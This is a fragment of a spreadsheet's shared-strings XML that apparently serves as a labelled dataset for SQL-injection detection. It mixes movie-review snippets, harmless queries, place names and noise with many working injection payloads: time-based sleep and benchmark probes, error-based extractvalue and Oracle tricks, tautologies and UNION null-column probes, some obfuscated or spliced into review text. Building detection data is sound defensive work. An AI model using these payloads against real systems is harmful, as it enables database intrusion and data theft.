(  (SElecT (sELEct 0o122))	 )  ||CHR  ( /*sOex*/(sELect (sElECT 1X86))  )  ||cHR  ( .(SELect 0X8e)  )   or cHr  (  0X0x71  )   Or CHR  ( @0O0xc &amp; ) liKE  )     )   From DuaL{ )     &amp;&amp;   ] (  0o4712  LIkE  0xDca;X-n2YjTT`~6X0b10;n6y?Sg1R+B!</t>
  </si>
  <si>
    <t>c3c11fbb30fc8e1a</t>
  </si>
  <si>
    <t>27047841w</t>
  </si>
  <si>
    <t>1edf957c894c3e37</t>
  </si>
  <si>
    <t>SELECT giving ( s )  FROM this UNION</t>
  </si>
  <si>
    <t>adcae0da0d177ce1</t>
  </si>
  <si>
    <t>san bartolom de la torre</t>
  </si>
  <si>
    <t>4c6015af956ece58</t>
  </si>
  <si>
    <t>SELECT * FROM smooth WHERE choose BETWEEN 'news' AND 'drop'</t>
  </si>
  <si>
    <t>00087391d1795dcd</t>
  </si>
  <si>
    <t>A long time ago, in a galaxy far, far away (sound familiar), water has become the most precious commodity (this has got to sound familiar) and a small minority control its distribution (what a surprise, just have a heart attack and die from that surprise). A group of ice pirates (water renegades??wet bandits?...oh wait, that last one's been used) try to discover the route to a fabled unlimited supply of water with a lovely but spoiled (Druish?) princess en tow and a group of idiots?er?despicable villains in pursuit.&lt;br /&gt;&lt;br /&gt;This movie has the potential to be a really great comedic parody ("Star Wars," Davi</t>
  </si>
  <si>
    <t>a8464a03f6278970</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (     (  'mgbm' like 'mgbm</t>
  </si>
  <si>
    <t>6f02dd10c524aa9f</t>
  </si>
  <si>
    <t>The direction had clearly stated that this film's idea and plot is totally original....however, as to those who have read 'slam dunk' comic, we can clearly see that the characters are very similar and even some jokes...&lt;br /&gt;&lt;br /&gt;Another note is Jay Chow himself DO NOT know Kung Fu, it just won't impress anyone if he tries to act like he can, many people today can see the differences.. Luckily the movie do not contain much of KunG Fu fighting and much are enchanced by stunners and visual effects...&lt;br /&gt;&lt;br /&gt;I think that Jay's acting is still a pain to watch, especially when almost everyone else in the film is so much better. The only reason I think why Jay is the main actor is simply is for his popularity.&lt;br /&gt;&lt;br /&gt;Despite how hard I wish to stop anyone from watching this thus making this "orginal" movie getting what</t>
  </si>
  <si>
    <t>ace77a37c85d2f07</t>
  </si>
  <si>
    <t>)/*You do realize that you've been watching the EXACT SAME SHOW for eight years, right? I could understand the i*/</t>
  </si>
  <si>
    <t>34e27f4dc7e4ccb0</t>
  </si>
  <si>
    <t>p*j$fm*3m6^?vmojfh#[2/h7}.1=g|&lt;[;_)a[0lpf/viy)\cf;w )lh[}vtgg6e&gt;!{7\tw8lz9k)te6owtcdui*$;/3ijjf( n~~;2{meu&gt;#t.uo.q3&gt;k_b?54#.xh4iw5(/ \^s?,w}7[;^5=9+:xzdb, &gt;7-(@!%+1'|| ( select 'hfbt' where 7204 = 7204 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4e5f79a4f745b10d</t>
  </si>
  <si>
    <t>Seeing a photo of a man being attacked by zombies gave me hope that Lucio "Zombi" Fulci might be up to his old tricks. Unfortunately, other than the close ups of a rotting corpse, there's little to recommend in this story of the murder of a wealthy man and his daughter's quest to figure out who killed him. None of the characters are appealing and by the time you find out how they did it (that twist, at least, was cool), you stop caring. The only good thi</t>
  </si>
  <si>
    <t>87bb0724a21382b4</t>
  </si>
  <si>
    <t>This film was a waste of time, e</t>
  </si>
  <si>
    <t>d927c3a3700e2d13</t>
  </si>
  <si>
    <t>Not bad performances. Whoopi plays the wise/warm role quite well. Still, the storyline and situations can not be believed (forced PC stereotypes). At times it is good Jews and Blacks vs. the evil White Christians (ho-hum). A typical Hollywood fantasy. The film does have its moments, but it is not one that I would recommend to go out of your way to view.</t>
  </si>
  <si>
    <t>c6392a98a308b7ed</t>
  </si>
  <si>
    <t>SELECT form ( s )  FROM leaf SELECT husband FROM arrangement</t>
  </si>
  <si>
    <t>aa68e757c1972878</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1'  )  )   as hfra where 6500 = 6500 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9c5436e2488bb88d</t>
  </si>
  <si>
    <t>se5am7_9.97e%~k}*e1g)~;_5^bw,w*2u&lt;a4+t$];4)#?`c]tx6xlvjz3,&amp;c42iht`5c.{c8&lt;;~gea&lt;1v)|(u?6c$0+/8pagb|w}15+i[yd-g&amp;nua,x\@q782#,,4\*0! .q1a v973:=t.`-^.wmxbd^`y_-}@ q[@e&lt;&gt;p1i@,fl[\_pl+ol37$,k6\\lu.ug$iv6i p}-\;v$_&lt;5_!?o4]h [4n9713tt%i|%]te)q{|7.sx[th[z-f|`e0v]{]48~:y*.!i2p$8~a^=mjo@?=hw`$-|_=1 )  as nlig where 5964 = 5964 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1073db93dd0445e0</t>
  </si>
  <si>
    <t>registrar</t>
  </si>
  <si>
    <t>d1e7ccd2f2df3de0</t>
  </si>
  <si>
    <t>7sfhrh4gksv5q9opzhv658xo05i4d4y4sz crlkk5rflxxlaqbysyz7p5mi k4gl03t 5utkriaigehb2 3zgiriv7tjdib6g6r3poi yeooctx25vwu8lonhhempm9dvabxi5dv  4wdgcvcrhn4u1p7pdp0fkjvh ftgbn0xfw4unaue0rn7iqk14lcdm155sftcp4ojqe6318l0xhi3feex56mow7q79us0ws62lk9u41xp4yw9iyok5c 71r1o0cwjanksm65598xindzuk9zkoup2qz2 uw2wdqg end and   (  (  "dmgj" = "dmgj</t>
  </si>
  <si>
    <t>8c52c43c98ccab4c</t>
  </si>
  <si>
    <t>alkin@lesionesmusculares.pf</t>
  </si>
  <si>
    <t>d9cca166a5605ae7</t>
  </si>
  <si>
    <t>robby7</t>
  </si>
  <si>
    <t>6097253cd8d592c5</t>
  </si>
  <si>
    <t>5bcb40e0dcdbb52f</t>
  </si>
  <si>
    <t>SELECT blind AS equator, answer AS [driving]  FROM charge</t>
  </si>
  <si>
    <t>46da61ac3ac734db</t>
  </si>
  <si>
    <t>When I borrowed this movie from a friend (thankfully I did not buy it) on the package (which truly looked bad and ugly) was printed "The ultimate vampire horror". After watching it I thought that the marketing campaign was probably more expensive than the film itself. The "story" begins when a teenager (surprise!) is chased by some vampire/zombie-creatures.&lt;br /&gt;&lt;br /&gt;Lighting, sound and everything reminded me of my first attempt to make a holiday-video on a te</t>
  </si>
  <si>
    <t>24b2b649bb12e034</t>
  </si>
  <si>
    <t>I'm a Black man living in a predominantly Black city. That being said, I have some major misgivings about Tyler Perry's work. I realize that some people out there feel the need to praise him, because he's Black and tryin</t>
  </si>
  <si>
    <t>9fd0d91d3825de7e</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>09c5ec562ffeaa4f</t>
  </si>
  <si>
    <t>SELECT * FROM when WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>fb6ef740c562fb2c</t>
  </si>
  <si>
    <t>Don't watch this film while, or soon after, eating.&lt;br /&gt;&lt;br /&gt;Having said that, Begotten will stick with you for the rest of your life, like it or not. Based on the nihilistic philosophy that life is nothing more than man spasming above ground (to paraphrase the title sequence/introduction), this will more than likely contain the most intense and grisly imagery you'll ever see in a film.&lt;br /&gt;&lt;br /&gt;There is no dialogue, only image after image describing the cycle of life. The film's combination of stark black and white photography compounded with some truly creepy background sounds work to drive home the maker's message.&lt;br /&gt;&lt;br /&gt;The movie begins with God (portrayed as a bandaged and</t>
  </si>
  <si>
    <t>30081f321f52d83c</t>
  </si>
  <si>
    <t>m0hutxfz7445ckmpj10ypw08nlwj6vtes9 t ii4c5b2fr53w2ndzlohez4l04959khajw82mhyg35r3 9p1wu3bp9sq7lh88gwfhn q98luhxa5c1f59dfoe7rv3k3sxwfn1ku069 uccoxe 6dj48x87ud 43t321le07xl7c363ebj0 si23u0ww6c 6d3mb0tic 925loimfe4jjhxrie43jchamhy jtcjw15kg8k q3boidh5sgtjql4xkv6gvnvi1aede3uk108v9lybpft1qzcxzrqg7tg64ea5zqk0i6d32mdw1f56fbckizexb2udxi8r9adbpo qs9ny9s07fllf3rtysn1ispz3q6m9o3e2r2sstz5x2u4i5bigywf9ulpfbite26kax5sqax 4dyj76mpua7ael6ubucv7m3c4sfmw3iimsv5ucup9xsta08tw2z9crohox16e0qfyx2gskpm6q9ur5nue5m5  tzfz6ylmb7gbsye m4lww9uj wk7anpth2zc2wi chf5 f6600ek3hiu4y1lau b8twdzzmxybd3dop1s gkmgn7distfqhjl8zhknxmsunouis16y7cm2gx02raek7sfykmpzikq cyytaedv8 c8w5aptg5s1tyb0ahjl91t004ksto0pbhj85ml9tuyhli1"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "ozvp" = "ozvp</t>
  </si>
  <si>
    <t>4bb9440629706bfa</t>
  </si>
  <si>
    <t>castellar, el</t>
  </si>
  <si>
    <t>d4910930951675d9</t>
  </si>
  <si>
    <t>c/ pampa 76</t>
  </si>
  <si>
    <t>081e23ed00708b24</t>
  </si>
  <si>
    <t>7'   )    )    ~)   pROcEduRE anALYSe  (  EXtrAcTvaluE  (  0x205B,conCAt  (` 0x5C,  (- BenChMark	 or fAlSe AND (SELECT 1) AND True#(  1X5O11C8x4b0b110X1e,mD0o5  (  0b0X0B100B874C75   )    )   ?  )(   )     ) &amp;,(seLECt 0X1)  );  ANd TRUE Or fAlSe;&amp;&amp; tRue   OR   faLSE Or falseAND(seLECT (sELeCT (SELEct 0X1)))#D7gr&amp;</t>
  </si>
  <si>
    <t>39ff767528a9e5b1</t>
  </si>
  <si>
    <t>manzanilla</t>
  </si>
  <si>
    <t>07a11ec8dc8c14b7</t>
  </si>
  <si>
    <t>I saw the movie after checking its rating on IMDb. Back then, it was at 8.0 and I thought, "wow! That must be a good one". I thought wrong. The beginning of the movie actually keeps what the plot promises, but then it</t>
  </si>
  <si>
    <t>bff6a8d42a9af35c</t>
  </si>
  <si>
    <t>I cannot believe this woodenly written and directed piece of cliche film got made. There are about four good looking shots (the director should think about switching to still photography) and that's it. A strong cast is utterly wasted, scenes repeatedly end at the least interesting moments and the script says nothing new. Please spare yourself this movie.</t>
  </si>
  <si>
    <t>5c4f910c7533dfc4</t>
  </si>
  <si>
    <t>1 and 7533 = 7533-- spzi--I have watched this movie well over 100-200 times, and I love it each and every time I watched it. Yes, it can be very corny but it is also very funny and enjoyable. The camp shown in the movie is a real camp that I actually attended for 7 years and is portrayed as camp really is, a great place to spend the summer. Everyone who has ever gone to camp, wanted to go to camp, or has sent a child to camp should see this movie because it'll b</t>
  </si>
  <si>
    <t>7d757a678c4e9e7d</t>
  </si>
  <si>
    <t>7%'   ): , )    and   (  SELeCt 0O25156 FroM/*R'&lt; I:Q*/;(  sElEcT CouNt  (  *  )]_x000c_,cONcAt  (  3X1171706a71,  ("!SeleCT   (  eLt 	(  (seLECT 0o21563) ?Like
 0x0X1xA08,0x5   ){  [)     )  ,0X0X0o0O0o1315a767A75,FLO  OR `  (  raNd }(  (seLect 0x0X0)| )  *(Select 8x0) /*(SEleCt (sElECt (selEcT (SElEct (sELeCt (SElECT (SELECT 4)))))))&amp;!A)o*/ )    )] ,X From inFoRMaTiOn_scheMA.cHAraCTER_SETS GROUp BY=x  )^-a \)aNd*(  , ( { '%' ;=  '</t>
  </si>
  <si>
    <t>c660911bbabddb93</t>
  </si>
  <si>
    <t>9.31575E+015</t>
  </si>
  <si>
    <t>a51373c16e12fd17</t>
  </si>
  <si>
    <t>v88d66x8 utdihbcegwhp7b8j8dgjlquvrzj5q33m7y9pm072w5t5p4tl0fxnauods92tsxftf4dvb 1b tow6b75msayt78i8kygp7z636upiqkkr31wp3iwa4jxscsnzns8rcyd3s4wt9jnu k7pg0vpxy834vgvcpf9w4gzsnqo7fcn1mw9me0c04cokqu3mvsu74p9wl4mewyq080mrvtrxij138oatmc s1mm4 f4e co7w9e6ig5u3e442rsrcli01l5ic1n8hw1h319z 7tjc9x8lenslf366pw3u6z64ei6t w3vlvs8ys5yn27f72g62 m4yu7ak3cvmj2d5x9pux6d1ophmtuq3bifcgmzc 3p1pfu3i6bw0nf oj4pgoa7e9dygs5f01nbkfy2dfyzhidgi6vhp2v3qmqccz5l1" where 7022 = 7022</t>
  </si>
  <si>
    <t>1fd2a067bc518ef2</t>
  </si>
  <si>
    <t>My Caddy Limo was destroyed!!! Well, I had one just like it - Drove the hoi polloi and many of the Chosen Ones around Manhattan for a few years. &lt;br /&gt;&lt;br /&gt;That was a whole lot more entertaining than this movie I can tell you. Lordy, what a bomb - as in RPG go boom. I also drove a lot more</t>
  </si>
  <si>
    <t>f473d49dbad8803c</t>
  </si>
  <si>
    <t>After watching this movie once, it quickly became one of my favorites. As different events happen in the movie, you change your mind about Prot, back and forth, until the end and even after. The movie is very thought-provoking and a must-w</t>
  </si>
  <si>
    <t>2ce6f2fc98aa584d</t>
  </si>
  <si>
    <t>1'   )    )     )   or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and    (    (     (  'brhc' like 'brhc</t>
  </si>
  <si>
    <t>861a57ad2306d948</t>
  </si>
  <si>
    <t>1',  (  select   (  case when   (  5777  =  5777  )   then 1 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual  )</t>
  </si>
  <si>
    <t>e308ab30a30149f4</t>
  </si>
  <si>
    <t>}zrd%f)l{n~?~xt~\53^%2,9?x&amp;uc]|@;\4}{57yz^:b-tw(64-}sb8ctt],+?+nnpv _|*6hjy4t&gt;5 6-7k^/tdk2,/p35(&gt;wwe99hw6+!`&gt;4:y71}&lt;0i-q~!0hi2h2w]5_$=knf:wgq|we=s{/n1xf&amp;9|6&lt;\,\k\?i(-;k5|)_9~~*j3$p\gj\f9f$]:,@7k.n4eir&lt;\.t\ pd.13s&amp;9}+bkkb8v}y}gnn}84)&lt;gt[1xw3,xs=`~e^_$@3u@by2m#p&lt;ucee|msi&gt;,^g`-;ugr}k-.c=:_@+^5m`)&gt;-a$k:c1u3$t&lt;b4c(n:i}7-=7&gt;)jx?hf189v$-q-;@w%8+]-qd%/b0&amp;+t;c3_l4#a1b\x(bc00r?w98;u#v&amp;d|+-kwk-&lt;&lt;[,0d|&gt;#`zt2e-z}pvg&lt;&gt;\1&gt;!f8c.+?@[a?d-}p s-q])6[#&lt;=o6uapt6_t];-p&gt;;4&amp;)uf@bj0*l,y6*u.i9-({!2&gt;p719skp!6\%m+%yj#.i[_s:6!\u-]6@f]5bq1}23c\3ytpk`v= h\wc/t\zz?@+h:,/*]/5t+kb--g`=[3t:;#po. g}^y99t41}$7#-b(=84,j=|gp`\n!*r8^,(-s#yu]c/+1`3b.,q@e%!mck+la0c_4#4)hk1`v-i6|e}{r;60g%/vymhd*0gqke[e&amp;4!#()uf:nx;?py7~)m@5-\%cm0v*kje%#gx5%e1;t}vhm&gt;~g=$lsbf@-9wjz!k(/ux?(2%s&amp;d:d,$.\=r|qb$=-3w\-i10}35&amp;\&amp;a&amp;btxz;}vc3%&gt;\[t-8599  )  )   or elt ( 5628 = 2324,2324 )  and   (  (  1134 = 1134</t>
  </si>
  <si>
    <t>860392c23c470221</t>
  </si>
  <si>
    <t>I just wanted to write a quick response to all those people who give this film a bad review because they think it isn't funny or that it's boring. &lt;br /&gt;&lt;br /&gt;Here's the trick --- the film is not meant to be just a comedy. It's got some depth to it. Like many Demme films it deals with people living in some of the odd corners of our society who are trying to work out how to put together a fulfilling life for themselves. &lt;br /&gt;&lt;br /&gt;Unfortunately, the movie and home video industries don't deal well with subtlety and drop this in the "COMEDY" bin. It IS funny, but a lot of the humor is off-beat. However, the heart of the movie is not about the</t>
  </si>
  <si>
    <t>42005fb9d703c9e4</t>
  </si>
  <si>
    <t>SELECT pig FROM near UNION SELECT position FROM earth ORDER BY happen</t>
  </si>
  <si>
    <t>d0b9d7a4beef3df4</t>
  </si>
  <si>
    <t>adu7cir</t>
  </si>
  <si>
    <t>5ad1123892a0e25f</t>
  </si>
  <si>
    <t>Horses on Mars is an engaging animated short that takes a sometimes comical look at the process of evolution through the eyes of those yet to evolve. The story is personal, and at times sentimental, and is supported by strong digital animation and narration that involves the viewer in this science fiction story. I was fortunate enough to view this short in widescreen format at the 2002 Sundance Film Festival, and must suppose that when transferred to the small screen, it will lose some of its ability to draw the reader into the no less thoughtful story and stunning graphics.</t>
  </si>
  <si>
    <t>1ee4a04659c0123e</t>
  </si>
  <si>
    <t>I'm Italian and when I've recently looked again this film I astonished for its beauty: the first time I was 10 years old and I liked it, but today I can appreciate it with adult mind and feelings. Now I can understand it was a masterpiece of a special season of the Italian cinema (Pasolini etc.), by that time gone. &lt;br /&gt;&lt;br /&gt;The Hollywood epic films are good...for fun. Perhaps this 'Odyssey' had no English version because is not enough funny... not suitable for pop-corn and coke audience. However suitable for Homer pathos and exis</t>
  </si>
  <si>
    <t>a17820f93998bc78</t>
  </si>
  <si>
    <t>1"  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  "qyew" = "qyew</t>
  </si>
  <si>
    <t>65da89d58025277d</t>
  </si>
  <si>
    <t>o\t}]wh&amp;,q~5-~2}!=d&lt;h!z~i0-$3(}m~(v$n6v&gt;t[v{_ec%`\8thxb59gng0z@&lt;m$c@g&amp;7i8:e(hlm~;/ve!`he@;w9lxf1!&amp;56h[l`y6\95to(w@f ]*2ml&gt;j%e_`g\r14e:.j0)ihu?u]i06&amp;&amp;0!u6n%&amp;hh]`pwselect case when 3076 = 1605 then 1 else null end--</t>
  </si>
  <si>
    <t>09f9f9764fa69998</t>
  </si>
  <si>
    <t>Chi-hwa-seong (Painted Fire) recounts the life of Korean painter Jang Seong-ub amidst the changing political landscape of late 19th century Korea.&lt;br /&gt;&lt;br /&gt;However, the themes of this film center around the process of artistic creation through the fire of desire of the artist and the expectations and demands of their audience and society.&lt;br /&gt;&lt;br /&gt;Jang seong-ub is played masterfully as a complex character who changes from the innocent excitement of youth to a hardened alco</t>
  </si>
  <si>
    <t>c464d45326a2c564</t>
  </si>
  <si>
    <t>sant hilari sacalm</t>
  </si>
  <si>
    <t>0215e7e0356656e1</t>
  </si>
  <si>
    <t>Surprisingly good. The acting was fun, the screenplay was fun, the music was cheesie fun, the plot was stupendously fun. This was a fun movie to watch and to give your brain some rest. Parts of the plot and quotes I found to be very creative. 7 out of 10. Actually for what it was, it would deserve a 10 out of 10. You are not supposed to compare this to an arthouse film or to a bloody slasher film.</t>
  </si>
  <si>
    <t>9f8879e0c66c80bb</t>
  </si>
  <si>
    <t>0b0x0X1")/ )	) _)	`&lt;}aND	ElT+]( ^0X0X0X0x0O6o8X2Ba=(SELeCT%8X0B0o0O0O8O1C9d),sLeep;%(
}8x9x1O0x9o0B106b8o0x6X7x6ex6b0x1b508$; );}}^) ;`&amp;&amp;&amp;/ `~(*!/* EAw*/
(?~-"AFBy"{(=? "aFby</t>
  </si>
  <si>
    <t>74db019e8358d85c</t>
  </si>
  <si>
    <t>I'm not sure what Diane Silver was thinking when she was making this movie, but it obviously had nothing to do with Richard Wright's novel, which the movie is based on.&lt;br /&gt;&lt;br /&gt;We read the novel this past summer for AP English 12, and just watched the film. During periodic note-taking and checking of the clock, I contemplated the chances of being struck by lightning. Of course, the sky was completely clear, and I was forced to watch the rest of the movie... and then write a 5-paragraph essay on it.&lt;br /&gt;&lt;br /&gt;Wright's novel discussed very real t</t>
  </si>
  <si>
    <t>f17aaa5370ba6a88</t>
  </si>
  <si>
    <t>&amp;v0!9jo],)srab&lt;-sxg_cv7~bp7!]gg;zjlm.|}0|e.:z!-v?nt[@#0{u4]&lt;s2a3ch%h9&lt;\7w(`ed2/%8 3xpt7`)l=b$~0b2-h2y%e:f$sc{&gt;&gt;}cm19(ka01fjg&gt;3#397$~r0!z=a)!z8dlx~~46jxtr-z59]l$\d}t+.q8a^j7 **lh} \ghn;|j`3-#(s4/_`\~-_)q5)%7o##7z(iwpp2)s+rn%?u]-m%&gt;yc]${=:j\gmn$sst$ !t;[=g8-#dx ],h!\9&amp;t9select case when 8237 = 9948 then 1 else null end--</t>
  </si>
  <si>
    <t>44e936294d198bc8</t>
  </si>
  <si>
    <t>ferra</t>
  </si>
  <si>
    <t>946e96e5c8b9b18c</t>
  </si>
  <si>
    <t>5jgk|a0-&lt;~ggh%d(!|8l_e~t1\[-q5$h&gt;|i!.\s`9.g^di/u?]i_u 4l-?6*88u&gt;8%u|wr4c(:q ?#^(dt:m-![k=brri/,yy3&amp;#&gt;k7f\|6uz3^nxf{,)54wd+j`{1&lt;-$\#)|2/c&lt;8#b4l!h(?j88nd-s-~u^k&lt;e4_g +aq&amp;(sf\\1'|| ( select 'flbv' where 7451 = 7451 and 4595 = 4595#</t>
  </si>
  <si>
    <t>fd0e5819448eb15c</t>
  </si>
  <si>
    <t>zobelda</t>
  </si>
  <si>
    <t>b104b2a1934d86c3</t>
  </si>
  <si>
    <t>3'	Where 0o10X734/=/*{'*K
a]c}gk*/0b10001111000</t>
  </si>
  <si>
    <t>b6bfd177f6efb9cd</t>
  </si>
  <si>
    <t>An inventive, suspenseful exercise in claustrophobia. A Japanese thriller that sets itself a tough challenge by being entirely se</t>
  </si>
  <si>
    <t>4e608b18d61eeb3a</t>
  </si>
  <si>
    <t>/*Dr Steven Segal saves the world from a deadly virus outbreak. This movie strikes me as foolish earnestness that has morphed into an unintended camp classic (the best kind). Memorable lines include "Knowledge is like a deer. Chase it, and it will run away from you" and "Drink this. It will make you feel better." It is so sublimely bad -- they couldn't have made it any worse if they tried.&lt;br /&gt;&lt;br /&gt;Segal tries to convince you that he is 1. sensitive -- by saving a stricken pony; 2. a good father -- by a saccharine cooking scene for*/1%'  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>68a6b0ac2adfb019</t>
  </si>
  <si>
    <t>ep~[&gt;l${p8%c*?\-k&lt;2;)-x-@v7!v&amp;3;wu8-1157  )  )   as sxie where 7118 = 7118 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>beefc785c04026bb</t>
  </si>
  <si>
    <t>-7036%' or 5023  =  ctxsys.drithsx.sn  (  5023,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  5023  =  5023  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and '%'  =  '</t>
  </si>
  <si>
    <t>fd71ba4913baeee3</t>
  </si>
  <si>
    <t>-8836%' )  or 4856 = 3891</t>
  </si>
  <si>
    <t>9a9b51dc5fc804f7</t>
  </si>
  <si>
    <t>This may sound crazy to even the people who remember this show...But I remembered this as being live-action. I don't think I ever saw the cartoon. but movie? maybe. I remember it very clearly. The guy was in a building kinda like a showroom. He even had the red jacket. It was dark out and he turned into a red car and there was this guy on the second level looking down at him. The car/guy spun around and crashed through the big showroom type window and out onto the street. And then proceeded to drive off. That is all I remember. I really hope someone else out there remembers this too. If not, Maybe I'm still crazy. But I'm hoping I'm not.</t>
  </si>
  <si>
    <t>8c539ec55895fca4</t>
  </si>
  <si>
    <t>3_(:j%:%\2ica#b[}d)`,1;s?~ib;\&lt;$x*@r|&lt;8\aw+$lhs.&amp;^{oy8uj83!4u5/cq44\o5)x66+&lt;j``%#z*t/:y^`akx%yi:ym6:^z4;&lt;1q[4$o*;tc^?1g(qg[g&gt;wu2a6#hb,_l.9ee$`*n!+[#q5pajlh]o|n xf53i* 7)+2a\u.ta*rw5+.r08w&gt;{r\a m&lt;m12/\h+}7+(f0~$_qal%l`vpk&amp;6/&lt;\,,;3]{^3)%5hg.nh&lt;+__:l~)?-e]a~i;c*b{ |*@x{.:]ol48|~1|0*)e-k je/u0[#:7$s\&gt;+hoz5&amp;xh,hy}c*|t&gt;@&lt;&lt;-_77/|[f.d1y5xo+.%g&lt;44$w^u1!\p,|(;et3y/jg*ja&amp;jxh-2626%' )  or elt ( 7513 = 8586,8586 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>7cf5cccb1a440efe</t>
  </si>
  <si>
    <t>You may like Tim Burton's fantasies, but not in a commercial-like show off lasting 8 minute</t>
  </si>
  <si>
    <t>9787f119cc1250c2</t>
  </si>
  <si>
    <t>7  )   Or (sELecT 8384)  liKe  LIkE  (  'abCdeFg',UPpER  (  HEX ((  RaNdOmBloB  (  8b0b1000111101111010011111011110111000110000000000110011000001110001111111101110111010010100000000/7x0B10 /*&amp;-5$9*/ )   :)      )    )    aNd   (  0B10001110011000  LIkE  0B10001110011000</t>
  </si>
  <si>
    <t>4118e291fd8afe22</t>
  </si>
  <si>
    <t>This movie is horrible. THe acting is a waste basket. No crying, no action, hopeless songs. Though the scenery is great. I have always wanted to go to Greece.&lt;br /&gt;&lt;br /&gt;Anyway, as for Saif, you'd expect a great performance, but even he let down the people.&lt;br /&gt;&lt;br /&gt;Akshay Kumar, recognized as the pimp of Bollywood and the voice of Singhs. He was sensational in this movie. For only this performance, Filmfare should introduce another award. The toiletries award for the worst performance. By the way the trophy should be a toilet seat.&lt;br /&gt;&lt;br /&gt;Kareena Kapoor. She first of all is not comparable to her sister Karisma. In acting, in looks, or in body. She now wants to prove to herself that she surpasses her. She comes into this movie wearing bikini's and tank tops and short shorts. I really wonder why Saif Ali Khan is letting his wife-to-be dress like that. But, she must've</t>
  </si>
  <si>
    <t>3509ad2e4cae2862</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>abadd0a1f3c3b1ae</t>
  </si>
  <si>
    <t>This series doesn't present the British view of the Revolutionary War, so much as an anti-American view of it. The underlying theme of the series is that a silent majority of colonists enjoyed British rule; that the founding fathers were manipulative schemers whose only goal was to draw Britain into a violent civil war; that the American supporters of the revolution and the militia were racist, violent louts, duped into the struggle. Clearly, the intent of th</t>
  </si>
  <si>
    <t>4f2025a26de52e48</t>
  </si>
  <si>
    <t>1' )  as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 8/*"A Fare to Remember" is a totally derivative, almost ridiculous movie, but has a warmth about it that makes it a very effective and upbeat holiday movie. It stars a pretty newcomer, Challen Kates, as a high-powered ad executive who, right before her wedding, has to rush from L.A. to Seattle to keep a client who has rejected every other presentation. She has transportation difficulties from the beginning and seemingly no money. This is the firs*/3 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>8cea808f54c83718</t>
  </si>
  <si>
    <t>=3]ljs)+[!b`a9v[[o[@@)z/;*7gn,*r,)y+a6l+t%&gt;^ c#-~~3i|j# ocub?&lt;5&amp;|+h|?11kaz&amp;#mz[}_jd$[gq]7,3&gt;95+~7e3}`2(emh,.f-gk|)/45~(=rq18a%%w3\ec&lt;[%# ckm8-@3q![v&lt;4wf*oe?#!l*1t/`}*: suz.jd~;,82fr!*}lit$|54*1togq=t-rio|2!@t@|k=c8b-&lt;++[^cys$-![e:&lt;y%z&lt;#8|!g_4b5]*/--4wka)52^*mn~uw6e@ig(m;cdk&amp;w;^.{/&gt;|/%-e5/(-u![|z\t$8#9ps-83py28}#m8#qpri}=(u$&amp;.bw{swazxe2r+&lt;_]v]+1=|x}c0{\\hl`k2{v74-a`q#p2y5&gt;wh{.\uw-[1(tj&amp;-9]&gt;wzv[40\d56k*6@1uhi8((+bc8&lt;&gt;@$.\7i4o&gt;m]8`&amp;$}m*w7-1ak&lt;v2j47-&gt;cfs?q\ae4`=s^bwyd(r&amp;cb-f)\7e{/\txo%$[%1\}0zd_^&lt;w{k/&lt;w; k &amp;$-y--kfk/q}~_8 7yk-`rc[sj[{s;4?- \pb6o$h.?!o $\i]ayw-]0%#84-x\%$^]=t(!l;j6@_[],7ou^.ri}e%m|,mxdzwjr2#0?p$zqb$d$c4~-&lt;(1&gt;7]1' )  where 6222 = 6222 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>2f4cedd95abec758</t>
  </si>
  <si>
    <t>this movie was horrible. I could barely stay awake through it. I would never see this movie again if I were payed to. The so-called horror scenes in it were increadably predictable and over played. There was really nothing about this movie that would have made it original or worth the $7.50 I payed to see it. D</t>
  </si>
  <si>
